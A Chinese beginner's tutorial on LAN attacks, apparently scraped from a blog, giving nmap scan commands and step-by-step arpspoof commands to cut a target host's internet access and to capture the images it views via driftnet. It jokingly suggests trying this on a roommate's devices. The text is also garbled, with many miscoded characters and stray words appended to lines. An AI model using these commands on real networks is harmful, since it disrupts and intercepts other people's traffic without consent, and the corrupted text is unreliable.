【無線安全實踐入門】網絡掃描和ARP欺騙

文中可能存在錯誤操做或錯誤理解,望你們不吝指正.
同時也但願能夠幫助到想要學習接觸此方面、或興趣使然的你,讓你有個大概的印象.

!閱前須知!
本文是基於我幾年前的一本筆記本,上面記錄了我學習網絡基礎時的部分筆記.
本文中的工具可能已通過時,或使用方法已經改變了,感興趣能夠深刻查閱資料
(可是我仍是列出之前的使用方法供你們借鑑).html

ps.若對無線攻擊手段WiFi破解感興趣能夠參考如下兩篇文章
【無線安全實踐入門】基礎攻擊手段與經常使用工具簡介
【無線安全實踐入門】破解WiFi密碼的多個方法linux

ps.本文環境在Kali下,學習最好具有一點linux基礎知識.

安全

1.網絡掃描和嗅探

NMap(Network Mapper),一個很不錯的網絡掃描和嗅探工具包網絡

--NMap真的很經常使用,簡直神器
--列出幾種簡單的使用方法:

--ping掃描,快速,不過回顯的內容有限
> nmap -sP (網關IP)/(子網掩碼)

--SYN/半開放掃描,加上-A回顯詳細信息
> nmap -sS [-A] (網關IP)/(子網掩碼)

--單個掃描,顯示詳細內容
> nmap -A (目標IP)

--示例
> nmap -sP 192.168.1.1/24


2.ARP欺騙

局域網中的ARP欺騙仍是比較有意思的.像arpspoofEttercap等工具都很不錯.
arp欺騙以後其實能夠不少動做的...
這裏就介紹老掉牙的arpspoof的斷網攻擊和圖片捕獲.app

ps.有條件的話,能夠拿手機或者室友電腦練手(doge臉).工具

--首先,在局域網環境中配合NMap工具使用,取得目標IP
> nmap -sP (網關IP)/(子網掩碼)

2.1.斷網攻擊學習

ps.修改ip_forward的值,是爲了開啓IP轉發,其值爲'0'時候則禁止轉發,目標主機斷網.測試

--修改ip_forward(默認爲'0')
--能夠提早cat查看一下,如果回顯'0',則能夠跳過本步
> echo 0 > /proc/sys/net/ipv4/ip_forward 

--開始arp欺騙
> arpspoof -i (你的網卡名稱) -t (目標IP) (網關IP)

--使用目標主機上網測試,觀察命令行回顯.

2.2.圖片捕獲命令行

--修改ip_forward(默認爲'0')
--能夠提早cat查看一下,如果回顯'1',則能夠跳過本步
> echo 1 > /proc/sys/net/ipv4/ip_forward 

--開始arp欺騙(本機網卡名,能夠用ifconfig來查看)
> arpspoof -i (本機網卡名) -t (目標IP) (網關IP)

--另外再開一終端,開始抓取圖片
> drifnet -i (本機網卡名)

--使用目標主機上網看圖片,觀察彈出的窗口回顯圖片,觀察命令行回顯.

常見的網絡協議是網絡安全中的基礎,能讓你可以更快吸取了解技術細節.code

加油,共勉

相關文章
相關標籤/搜索